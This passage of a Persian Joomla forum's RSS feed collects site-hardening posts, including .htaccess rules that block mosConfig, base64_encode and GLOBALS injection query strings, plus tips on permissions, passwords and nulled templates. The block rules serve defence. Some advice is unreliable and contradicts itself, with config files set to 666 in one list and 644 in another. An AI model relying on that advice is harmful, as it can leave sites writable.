علاوه بر این، وقتی که از آدرس URL متناسب با قوانین موتور جستجو (SEF یا Search Engine Friendly) استفاده کنید، در موتورهای جستجو مانند گوگل رتبه بندی بالاتری برای نمایش سایت خود در نتایج جستجو بدست خواهید آورد.<br />
<br />
جوملا و افزونه های آن را همیشه به روز نگه دارید<br />
این یکی که بسیار آشکار است. همیشه به دنبال استفاده از آخرین نسخه های جوملا و همچنین افزونه های نصب شده در آن باشید. بسیاری از آسیب پذیری های نسخه های قدیمی تر در نسخه های جدیدتر برطرف شده و می تواند گره گشای مشکلات شما باشد.<br />
برای هر پوشه و فایل از CHMOD صحیح استفاده کنید.<br />
تنها زمانی تنظیم پرمیشن فایل ها و یا پوشه ها را CHMOD of 777 or 707 قرار دهید که یک اسکریپت نیاز به بازنویسی آن فایل یا دایرکتوری داشته باشد. همه فایل های دیگر باید تنظیمات زیر را داشته باشند :<br />
• فایل های پی اچ پی : 644<br />
• فایل های پیکربندی (Config) : 666<br />
• سایر پوشه ها : 755<br />
فایل های باقی مانده و زائد را حذف کنید<br />
هنگامی که یک افزونه نصب می کنید اما بعد می فهمید نیاز و تمایلی به استفاده از آن ندارید، افزونه را به حال خود رها نکنید. اگر چنین کاری را انجام دهید، فایل های آسیب پذیر هنوز هم در وب سایت شما وجود دارند. بنابراین به سادگی از منوی un-install استفاده کنید تا از شر افزونه های زائد خلاص شوید.<br />
فایل .htaccess را تغییر دهید.<br />
خطوط زیر را به فایل .htaccess خود برای جلوگیری از برخی از سوء استفاده رایج وارد کنید:<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]<br />
# Block out any script trying to base64_encode crap to send via URL<br />
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]<br />
# Block out any script that includes a tag in URL<br />
RewriteCond %{QUERY_STRING} (|%3E) [NC,OR]<br />
# Block out any script trying to set a PHP GLOBALS variable via URL<br />
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]<br />
# Block out any script trying to modify a _REQUEST variable via URL<br />
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2}) [OR]<br />
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)<br />
RewriteCond %{QUERY_STRING} CONFIG_EXT([|%20|%5B).*= [NC,OR]<br />
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)<br />
RewriteCond %{QUERY_STRING} sbp(=|%20|%3D) [OR]<br />
RewriteCond %{QUERY_STRING} sb_authorname(=|%20|%3D)<br />
# Send all blocked request to homepage with 403 Forbidden error!<br />
RewriteRule ^(.*)&#36; index.php [F,L]</code></div></div>
]]></description>
			<content:encoded><![CDATA[با توجه به گسترش روزافزون هکرهای اینترنتی، افزایش امنیت سیستم مدیریت محتوای سایت شما بسیار مهم و حیاتی می باشد.<br />
بسیاری از طراحان وب بیشترین زمان خود را صرف طراحی گرافیکی و بالا بردن رتبه سایت در گوگل می کنند و زمان نسبتا کمی را برای بالا بردن امنیت سایت صرف می کنند.<br />
در این مقاله سعی شده است تا با ارائه راه کارهای مختلف شما را در بالاتر بردن امنیت سیستم مدیریت محتوا جوملا یاری رساند.<br />
<br />
1.ایجاد بک‌آپ از سایت<br />
اولین و مهمترین قدم در جلوگیری از عواقب هک شدن سایت ایجاد بک‌آپ از سایت می باشد که این بک‌آپ شامل فایل های اصلی جوملا و نیز دیتابیش جوملا می شود.<br />
گرفتن بک‌آپ بصورت ماهیانه را در برنامه خود بگنجانید زیرا با در اختیار داشتن بک‌آپ شما می توانید درصورت مواجهه با هر مشکلی آن را صرف چند ساعت به حالت اولیه بازگردانید.<br />
<br />
2.بروزرسانی نسخه جوملا<br />
با توجه به کدباز بودن سیستم مدیریت محتوا جوملا، احتمال یافت شدن رخنه های امنیتی در آن بالا می باشد و برای درامان ماندن از هک بوسیله این رخنه های امنیتی شما می بایست همیشه از آخرین نسخه های جوملا که توسط وب سایت رسمی جوملا منتشر می شود استفاده نمایید.<br />
<br />
3.احتیاط در استفاده از ماژول و کامپوننت ها<br />
ماژول ها و کامپوننت هایی که توسط خود جوملا منتشر نمی شوند به عنوان دسته سوم (3rd Party) شناخته می شوند.<br />
بسیاری از سایت های جوملایی بواسطه رخنه های امنیتی موجود در ماژول ها و کامپوننت های دسته سوم هک می شوند.<br />
در زمان نصب کامپوننت و ماژول دسته سوم نسبت به مسائل امنیتی آن تحقیق کنید و نیز آخرین نسخه های آن را نصب و بصورت مداوم بروز نمایید.<br />
در زمان حذف ماژول و کامپوننت نیز از پاک شدن کامل فایل های مربوط به آن و نیز اطلاعات مربوط در دیتابیس اطمینان حاصل نمایید.<br />
<br />
4.سطح دسترسی پوشه ها<br />
به محض پایان تنظیمات و نیز نصب کامپوننت ها و ماژول های لازم، سطح دسترسی تمامی پوشه های را به 744 تغییر دهید.<br />
برای انجام این کار می توانید از Cpanel ارائه شده استفاده نمایید.<br />
<br />
5.سطح دسترسی فایل ها<br />
سطح دسترسی تمامی فایل ها را به 644 تغییر دهید.<br />
<br />
6.سطح دسترسی به Configuration.php<br />
سطح دسترسی به این فایل را به 644 تغییر دهید.<br />
این مورد بسیار مهم می باشد چون تنظیمات اصلی جوملا در این فایل گنجانده شده است.<br />
<br />
7.امنیت .htaccess<br />
تمامی نسخه های منتشر شده جوملا شامل فایل .htaccess می باشند که شما می توانید با استفاده از آخرین نسخه این فایل بسیاری از رخنه های امنیتی شناخته شده در سایت خود را از بین ببرید.<br />
آخرین نسخه این فایل را به سرور انتقال داده و سطح دسترسی آن را به 644 تغییر دهید.<br />
<br />
8.تنظیم Register Globals<br />
در محیط مدیریتی جوملا از غیرفعال بودن Register Globals اطمینان حاصل کنید.<br />
در صورت روشن بودن آن (Register Globals Is Set To On) با شرکت میزبانی وب خود تماس گرفته و از آنها بخواهید تا این قابلیت را برای شما غیرفعال نمایند.<br />
راه دیگر برای غیرفعال کردن این قابلیت تغییر فایل .htaccess و افزودن کد زیر به آن می باشد.<br />
php_flag register_globals off<br />
<br />
<br />
<br />
جوملا (Joomla) سیستم مدیریت محتوا بسیار بزرگی است که در سراسر جهان مورد استفاده قرار می گیرد. به همین دلیل، هکرها اغلب سعی می کنند راهی برای نفوذ به وب سایت های ایجاد شده توسط جوملا پیدا کرده و به آن سایت ها حمله کنند. در این مقاله با ۷ نکته برای بهینه سازی سیستم امنیتی جوملا، برای جلوگیری از هک شدن وب سایت جوملای خود آشنا می شوید.به عنوان جعبه کمک های اولیه، همیشه به یاد داشته باشید به طور منظم یک نسخه ی پشتیبان (Backup) از وب سایت و پایگاه داده خود تهیه کنید. اگر در این حالت سایت شما هک شود، با استفاده از پشتیبان، همیشه می توانید به نسخه های قدیمی تر وب سایت خود برگردید. اطمینان حاصل کنید افزونه ای که باعث آسیب پذیری سایت شما گشته را پیدا کرده و آن را حذف کنید.<br />
تغییر پیشوند پیش فرض پایگاه داده (jos_)<br />
بیشتر حملات تزریق اس کیو ال (SQL injections) که به منظور هک نمودن وب سایت های جوملا نوشته می شوند، سعی در بازیابی داده ها از جدول . دارند. به این ترتیب، این حملات می توانند نام کاربری و رمزعبور مدیر وب سایت را بازیابی و در اختیار هکر قرار دهند. تغییر پیشوند پیش فرض به چیزی تصادفی، می تواند از اکثر و شاید همه حملات تزریق کد جلوگیری نماید.<br />
شما می توانید در هنگام نصب جوملا روی وب سایت، پیشوند پایگاه داده را تغییر داده و به چیزی دلخواه تنظیم کنید. اگر قبلا جوملا را نصب کرده و حالا می خواهید این پیشوند را تغییر دهید، اقدامات زیر را انجام دهید:<br />
• به سیستم مدیریت جوملای خود وارد شوید (Log on)<br />
• به تنظیمات سراسری (global configuration) رفته و پایگاه داده را جستجو کنید.<br />
• پیشوند پایگاه داده خود را تغییر دهید (به عنوان مثال: fdasqw_ یا _mohsen) و روی Save کلیک کنید.<br />
• برای دسترسی به پایگاه داده (database) خود به phpMyAdmin بروید.<br />
• به تب export بروید، تمام مقادیر پیش فرض را به حال خود رها کرده و دکمه Start را بزنید. ساخت و دانلود خروجی از بانک اطلاعاتی می تواند مدتی به طول بیانجامد.<br />
• وقتی که این کار انجام شد، همه کدهایی را که نمایش داده شده، انتخاب کرده و آن ها را در یک فایل متنی در notepad (یا هر ویرایشگر متنی دیگر) کپی کنید.<br />
• در phpMyAdmin ، همه جداول (tables) را انتخاب و آنها را حذف (delete) کنید.<br />
• در ویرایشگر متنی که کدها را وارد کرده اید عمل جستجو و جایگزینی (search and replace) را انجام دهید.در کادر عبارت جستجو jos_ را وارد کرده و در کادر جایگزینی با، پیشوند جدید خود (مثلا fdasqw_) را وارد کرده و دکمه Replace all را فشار دهید.<br />
• با زدن Ctrl + A همه متن را انتخاب کرد و از آن کپی بگیرید. در phpMyAdmin به SQL رفته، query ها (متن کپی شده) را پیست کرده و روی Start کلیک کنید.<br />
شماره نسخه و نام افزونه را حذف کنید<br />
بیشترین آسیب پذیری ها تنها در نسخه های ویژه ای از افزونه های (extension) خاص رخ می دهند. نمایش نسخه 2.14 از افزونه ای مثل MyExtension چیز واقعا بدی است. شما می توانید با انجام اقدامات زیر کاری کنید که این پیام تنها نام افزونه را نشان دهد:<br />
• همه فایل های افزونه را از روی سرور خود دانلود کنید.<br />
• برنامه Dreamweaver را باز کنید.<br />
• هر کدام از فایل های افزونه را که روی کامپیوتر خود دانلود کرده اید بارگذاری کنید.<br />
• از بخش جستجو استفاده کرده و جستجو را در حالت «Search through specified folder» تنظیم کنید. به پوشه ای که افزونه را در آن دانلود کرده اید، بروید.<br />
‏ • MyExtension 2.14 را به عنوان عبارت جستجو وارد نموده و OK کنید تا در تمامی فایل های پوشه انتخابی به دنبال آن بگردد.<br />
• هنگامی که فایل درست را یافتید، شماره ورژن (version number) را حذف کنید.<br />
• فایل تغییریافته را روی سرور آپلود کرده و بررسی کنید که تغییرات اعمال شده یا خیر.<br />
از عناصر متناسب با موتور جستجو استفاده کنید.<br />
اکثر هکرها از دستورGoogle inurl: command برای یافتن و بهره برداری از آسیب پذیرها بهره می گیرند. از افزونه های مبتنی بر SEF، sh404sef و ARTIO برای بازنویسی url در جوملا بر اساس اصول SEF استفاده کنید تا جلوی نفوذ هکرها از طریق پیدا کردن آسیب پذیری های اینچنینی را بگیرید.<br />
علاوه بر این، وقتی که از آدرس URL متناسب با قوانین موتور جستجو (SEF یا Search Engine Friendly) استفاده کنید، در موتورهای جستجو مانند گوگل رتبه بندی بالاتری برای نمایش سایت خود در نتایج جستجو بدست خواهید آورد.<br />
<br />
جوملا و افزونه های آن را همیشه به روز نگه دارید<br />
این یکی که بسیار آشکار است. همیشه به دنبال استفاده از آخرین نسخه های جوملا و همچنین افزونه های نصب شده در آن باشید. بسیاری از آسیب پذیری های نسخه های قدیمی تر در نسخه های جدیدتر برطرف شده و می تواند گره گشای مشکلات شما باشد.<br />
برای هر پوشه و فایل از CHMOD صحیح استفاده کنید.<br />
تنها زمانی تنظیم پرمیشن فایل ها و یا پوشه ها را CHMOD of 777 or 707 قرار دهید که یک اسکریپت نیاز به بازنویسی آن فایل یا دایرکتوری داشته باشد. همه فایل های دیگر باید تنظیمات زیر را داشته باشند :<br />
• فایل های پی اچ پی : 644<br />
• فایل های پیکربندی (Config) : 666<br />
• سایر پوشه ها : 755<br />
فایل های باقی مانده و زائد را حذف کنید<br />
هنگامی که یک افزونه نصب می کنید اما بعد می فهمید نیاز و تمایلی به استفاده از آن ندارید، افزونه را به حال خود رها نکنید. اگر چنین کاری را انجام دهید، فایل های آسیب پذیر هنوز هم در وب سایت شما وجود دارند. بنابراین به سادگی از منوی un-install استفاده کنید تا از شر افزونه های زائد خلاص شوید.<br />
فایل .htaccess را تغییر دهید.<br />
خطوط زیر را به فایل .htaccess خود برای جلوگیری از برخی از سوء استفاده رایج وارد کنید:<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]<br />
# Block out any script trying to base64_encode crap to send via URL<br />
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]<br />
# Block out any script that includes a tag in URL<br />
RewriteCond %{QUERY_STRING} (|%3E) [NC,OR]<br />
# Block out any script trying to set a PHP GLOBALS variable via URL<br />
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]<br />
# Block out any script trying to modify a _REQUEST variable via URL<br />
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2}) [OR]<br />
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)<br />
RewriteCond %{QUERY_STRING} CONFIG_EXT([|%20|%5B).*= [NC,OR]<br />
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)<br />
RewriteCond %{QUERY_STRING} sbp(=|%20|%3D) [OR]<br />
RewriteCond %{QUERY_STRING} sb_authorname(=|%20|%3D)<br />
# Send all blocked request to homepage with 403 Forbidden error!<br />
RewriteRule ^(.*)&#36; index.php [F,L]</code></div></div>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[مشکلات افزونه و قالب های وارز جوملا]]></title>
			<link>https://forums.parsjoom.ir/thread-7772.html</link>
			<pubDate>Sun, 12 Aug 2012 22:15:21 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-7772.html</guid>
			<description><![CDATA[درود<br />
چند وقتی میشه برخی مشکلات در انجمن مطرح میشه که عموما مربوط به استفاده از قالب و بسته های نصبی و افزونه ها وارز می باشد.<br />
<br />
یکی از مشکلاتی که این بسته ها دارند موجود بودن لینک های مخفی در این قالب ها است که توسط منتشر کننده قرار داده شده برای بالابردن رتبه سایت یا سایت های منتشر کننده که در اصل نوعی دزدی سئو محسوب میشود.<br />
همچنین ممکن است از نظر امنیتی مشکل داشته داشته باشند حالا با قرار دادن بَکدور یا روش های دیگر.<br />
با توجه به اینکه اکثر دوستانی که در انجمن های پشتیبان جوملا فعالیت میکنند از طراحان سایت هستند باید به این مسائل توجه کنند.<br />
واقعیتش دوست نداشتم تاحالا این حرف رو بزنم . آیا واقعا ارزش نداره برای سایتی که مبلغ مناسبی گرفتید قالب و افزونه های مورد نیاز رو بصورت تجاری تهیه کنید تا دچار مشکلات بعدی نشوید !!!<br />
<br />
من به همه دوستان پیشنهاد میکنم حتما در این مورد دقت لازم را داشته باشند و این رو بدونید که سایت های وارز حتما منافعی دارند که الحاقات مختلف رو منتشر میکنند و تعداد سایت های وارزی که الحاقات رو بدون دستکاری منتشر میکنند بسیار کم است و درکل نمیتوان به هیچ یک اعتماد کرد.<br />
<br />
<div style="text-align: center;"><span style="color: #800000;"><span style="font-size: small;">دوستان و کاربران محترم میتوانند در این تاپیک مسائلی رو که در این مورد مشاهده کرده اند برای اطلاع دیگر دوستان منتشر کنند.</span></span></div>]]></description>
			<content:encoded><![CDATA[درود<br />
چند وقتی میشه برخی مشکلات در انجمن مطرح میشه که عموما مربوط به استفاده از قالب و بسته های نصبی و افزونه ها وارز می باشد.<br />
<br />
یکی از مشکلاتی که این بسته ها دارند موجود بودن لینک های مخفی در این قالب ها است که توسط منتشر کننده قرار داده شده برای بالابردن رتبه سایت یا سایت های منتشر کننده که در اصل نوعی دزدی سئو محسوب میشود.<br />
همچنین ممکن است از نظر امنیتی مشکل داشته داشته باشند حالا با قرار دادن بَکدور یا روش های دیگر.<br />
با توجه به اینکه اکثر دوستانی که در انجمن های پشتیبان جوملا فعالیت میکنند از طراحان سایت هستند باید به این مسائل توجه کنند.<br />
واقعیتش دوست نداشتم تاحالا این حرف رو بزنم . آیا واقعا ارزش نداره برای سایتی که مبلغ مناسبی گرفتید قالب و افزونه های مورد نیاز رو بصورت تجاری تهیه کنید تا دچار مشکلات بعدی نشوید !!!<br />
<br />
من به همه دوستان پیشنهاد میکنم حتما در این مورد دقت لازم را داشته باشند و این رو بدونید که سایت های وارز حتما منافعی دارند که الحاقات مختلف رو منتشر میکنند و تعداد سایت های وارزی که الحاقات رو بدون دستکاری منتشر میکنند بسیار کم است و درکل نمیتوان به هیچ یک اعتماد کرد.<br />
<br />
<div style="text-align: center;"><span style="color: #800000;"><span style="font-size: small;">دوستان و کاربران محترم میتوانند در این تاپیک مسائلی رو که در این مورد مشاهده کرده اند برای اطلاع دیگر دوستان منتشر کنند.</span></span></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[بالا بردن امنیت  جوملا و هاست با انتخاب پسورد مناسب]]></title>
			<link>https://forums.parsjoom.ir/thread-7577.html</link>
			<pubDate>Fri, 03 Aug 2012 17:54:42 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-7577.html</guid>
			<description><![CDATA[درود<br />
استفاده از پسورد های ضعیف ،اللخصوص 123456  !  امنیت سایت و هاست رو  به خطر می اندازند<br />
<br />
اگر چنین پسوردی دارید سریعا نسبت به تغییر پسورد به یک پسورد مطمئن اقدام نمایید<br />
<br />
چگونگی انتخاب یک پسورد مطمئن و مناسب<br />
<br />
همیشه برای انتخاب پسورد برای خود دو چیز را در نظر داشته باشید:<br />
<br />
1-هیچ وقت پسورد خود را ساده انتخاب نکنید.<br />
<br />
زیرا داشتن پسورد ساده کار هکر را راحت تر کرده و خیلی ساده میتواند پسورد آی دی شما را هک کند.<br />
<br />
مثلا انتخاب پسورد 123456هیچ وقت نمیتواند پسوردی مناسب و خوب برای شما باشد.<br />
<br />
2-هیچ گاه مشخصات فردی را برای پسورد خود انتخاب نکنید.<br />
<br />
زیرا اگر کسی مشخصات شما را داشته باشد میتواند به ای دی شما نیز دست رسی داشته باشد.مثلا نام ,نام خانوادگی,شماره شناسنامه,نام همسر,شماره تلفن,تاریخ تولد و... نمیتواند پسورد مناسبی باشد.<br />
<br />
چگونه پسورد مطمئنی داشته باشیم:<br />
<br />
1-مد نظر گرفتن دو نکته بالا<br />
<br />
2-همیشه سعی کنید از ترکیب اعداد و حروف برای پسورد خود انتخاب نمایید<br />
<br />
3-استفاده از Space(فاصله) و Shift+123... (@#&#36;%^&amp;*) تا حد زیادی از لو رفتن پسورد جلوگیری میکند<br />
<br />
4-سعی کنید پسورد خود را بین دوتگ &lt;##&gt;قرار دهید (یک پنجره پی ام باز کنید این نوشته را بفرستید &lt;#IRAN#&gt;بعد آن را سند کنید ولی مشاهده میکنید که نوشته ای برای طرف مقابل فرستاده نشد)<br />
<br />
سایتهای تست پسورد :<br />
<br />
با استفاده از سایت زیر می تونید زمان دقیق هک شدن پسوردتون رو متوجه شوید :<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<br />
 <br />
<br />
سایتی برای کمک به انتخاب پسورد مناسب :<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
]]></description>
			<content:encoded><![CDATA[درود<br />
استفاده از پسورد های ضعیف ،اللخصوص 123456  !  امنیت سایت و هاست رو  به خطر می اندازند<br />
<br />
اگر چنین پسوردی دارید سریعا نسبت به تغییر پسورد به یک پسورد مطمئن اقدام نمایید<br />
<br />
چگونگی انتخاب یک پسورد مطمئن و مناسب<br />
<br />
همیشه برای انتخاب پسورد برای خود دو چیز را در نظر داشته باشید:<br />
<br />
1-هیچ وقت پسورد خود را ساده انتخاب نکنید.<br />
<br />
زیرا داشتن پسورد ساده کار هکر را راحت تر کرده و خیلی ساده میتواند پسورد آی دی شما را هک کند.<br />
<br />
مثلا انتخاب پسورد 123456هیچ وقت نمیتواند پسوردی مناسب و خوب برای شما باشد.<br />
<br />
2-هیچ گاه مشخصات فردی را برای پسورد خود انتخاب نکنید.<br />
<br />
زیرا اگر کسی مشخصات شما را داشته باشد میتواند به ای دی شما نیز دست رسی داشته باشد.مثلا نام ,نام خانوادگی,شماره شناسنامه,نام همسر,شماره تلفن,تاریخ تولد و... نمیتواند پسورد مناسبی باشد.<br />
<br />
چگونه پسورد مطمئنی داشته باشیم:<br />
<br />
1-مد نظر گرفتن دو نکته بالا<br />
<br />
2-همیشه سعی کنید از ترکیب اعداد و حروف برای پسورد خود انتخاب نمایید<br />
<br />
3-استفاده از Space(فاصله) و Shift+123... (@#&#36;%^&amp;*) تا حد زیادی از لو رفتن پسورد جلوگیری میکند<br />
<br />
4-سعی کنید پسورد خود را بین دوتگ &lt;##&gt;قرار دهید (یک پنجره پی ام باز کنید این نوشته را بفرستید &lt;#IRAN#&gt;بعد آن را سند کنید ولی مشاهده میکنید که نوشته ای برای طرف مقابل فرستاده نشد)<br />
<br />
سایتهای تست پسورد :<br />
<br />
با استفاده از سایت زیر می تونید زمان دقیق هک شدن پسوردتون رو متوجه شوید :<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<br />
 <br />
<br />
سایتی برای کمک به انتخاب پسورد مناسب :<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[کتاب الکترونیکی امنیت در جوملا (سطح مقدماتی)]]></title>
			<link>https://forums.parsjoom.ir/thread-7518.html</link>
			<pubDate>Tue, 31 Jul 2012 14:25:41 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-7518.html</guid>
			<description><![CDATA[<div style="text-align: center;"><img src="http://faupload.com/upload/91/Khordad/SevurityInJoomla-1.jpg" border="0" alt="[تصویر:  SevurityInJoomla-1.jpg]" /></div>
<br />
با درود فراوان<br />
بالاخره بعد از مدتها تونستم کتاب رو تموم کنم<br />
این کتاب مرحله مقدماتیه و برای اونایی که میخوان به تنهایی امنیت سایت های جوملایی خودشون رو تامین کنند کفایت می کنه<br />
این کتاب در شش فصل خلاصه میشه :::<br />
بخش اول ( امنیت در جوملا )<br />
بخش دوم – میزبانی و سرور<br />
بخش سوم – تست و توسعه<br />
بخش چهارم – پیکربندی<br />
بخش پنجم – مدیریت جوملا<br />
بخش ششم – بازیابی سایت<br />
<br />
<br />
تعدا صفحه : 21<br />
فرمت : PDF<br />
حجم : 800 کیلوبایت<br />
<br />
<br />
»» لینک های دانلود<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<br />
این کتاب با حمایت دو سایت معتبر جومینا و پارس جوم و به قلم بنده ی حقیر نگارده شده<br />
منتظر نظرات و انتقادات سازنده ی شما عزیزان هستم و امیدوارم این کتاب راهنمای هرچند کوچکی برای شما باشه<br />
<br />
در پناه حق<br />
مرتضی پورمحمد<br /><!-- start: postbit_attachments_attachment -->
<html>
		<head>
	<style type="text/css">
<!--
td.attachrow		{font: normal 11px Tahoma;}
td.attachheader     {font: normal 11px Tahoma; background-color: #ededed; }
table.attachtable	{font: normal 12px Tahoma;border-collapse : collapse; }
-->
</style>
	<style type="text/css">
<!--
td.attachrow		{font: normal 11px Tahoma;}
td.attachheader     {font: normal 11px Tahoma; background-color: #ededed; }
table.attachtable	{font: normal 12px Tahoma;border-collapse : collapse; }
-->
</style>
	<style>
<!--
table.attachtable	{font: normal 12px Tahoma;border-collapse : collapse; }
td.attachheader     {font: normal 11px Tahoma; background-color: #ededed; }
td.attachrow		{font: normal 11px Tahoma;}
-->
</style>
	</head>

	<table border="0" cellpadding="0" cellspacing="3">
<!-----Postbit_Attachment---->
	</table>
	<table class="attachtable" id="table2" width="95%" align="center" border="1" cellpadding="2" cellspacing="0">
		<tr>
			<td colspan="3" class="attachheader" width="100%" align="center"><b>
			Security-in-joomla(1).pdf</b></td>
		</tr>
		<tr>
			<td class="attachrow" width="15%"><span class="genmed">نوع فا&#1740;ل</span></td>
			<td class="attachrow" width="75%">
			<img src="images/attachtypes/pdf.gif" border="0" alt=".pdf" /></td>
			<td rowspan="3" class="attachrow" width="10%" align="center">
			<a href="attachment.php?aid=4671">
			<img src="images/download.png" alt="" border="0"></a><br>
</td>		</tr>
		<tr>
			<td class="attachrow" width="15%"><span class="genmed">دفعات دانلود</span></td>
			<td class="attachrow" width="75%"><span class="genmed">154</span></td>
		</tr>
		<tr>
			<td class="attachrow" width="15%"><span class="genmed">اندازه</span></td>
			<td class="attachrow" width="75%">816.91 کیلوبایت</td>
		</tr>
	</table>
	<br>
	</head>
	</html>

<!-- end: postbit_attachments_attachment -->]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;"><img src="http://faupload.com/upload/91/Khordad/SevurityInJoomla-1.jpg" border="0" alt="[تصویر:  SevurityInJoomla-1.jpg]" /></div>
<br />
با درود فراوان<br />
بالاخره بعد از مدتها تونستم کتاب رو تموم کنم<br />
این کتاب مرحله مقدماتیه و برای اونایی که میخوان به تنهایی امنیت سایت های جوملایی خودشون رو تامین کنند کفایت می کنه<br />
این کتاب در شش فصل خلاصه میشه :::<br />
بخش اول ( امنیت در جوملا )<br />
بخش دوم – میزبانی و سرور<br />
بخش سوم – تست و توسعه<br />
بخش چهارم – پیکربندی<br />
بخش پنجم – مدیریت جوملا<br />
بخش ششم – بازیابی سایت<br />
<br />
<br />
تعدا صفحه : 21<br />
فرمت : PDF<br />
حجم : 800 کیلوبایت<br />
<br />
<br />
»» لینک های دانلود<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<br />
این کتاب با حمایت دو سایت معتبر جومینا و پارس جوم و به قلم بنده ی حقیر نگارده شده<br />
منتظر نظرات و انتقادات سازنده ی شما عزیزان هستم و امیدوارم این کتاب راهنمای هرچند کوچکی برای شما باشه<br />
<br />
در پناه حق<br />
مرتضی پورمحمد<br /><!-- start: postbit_attachments_attachment -->
<html>
		<head>
	<style type="text/css">
<!--
td.attachrow		{font: normal 11px Tahoma;}
td.attachheader     {font: normal 11px Tahoma; background-color: #ededed; }
table.attachtable	{font: normal 12px Tahoma;border-collapse : collapse; }
-->
</style>
	<style type="text/css">
<!--
td.attachrow		{font: normal 11px Tahoma;}
td.attachheader     {font: normal 11px Tahoma; background-color: #ededed; }
table.attachtable	{font: normal 12px Tahoma;border-collapse : collapse; }
-->
</style>
	<style>
<!--
table.attachtable	{font: normal 12px Tahoma;border-collapse : collapse; }
td.attachheader     {font: normal 11px Tahoma; background-color: #ededed; }
td.attachrow		{font: normal 11px Tahoma;}
-->
</style>
	</head>

	<table border="0" cellpadding="0" cellspacing="3">
<!-----Postbit_Attachment---->
	</table>
	<table class="attachtable" id="table2" width="95%" align="center" border="1" cellpadding="2" cellspacing="0">
		<tr>
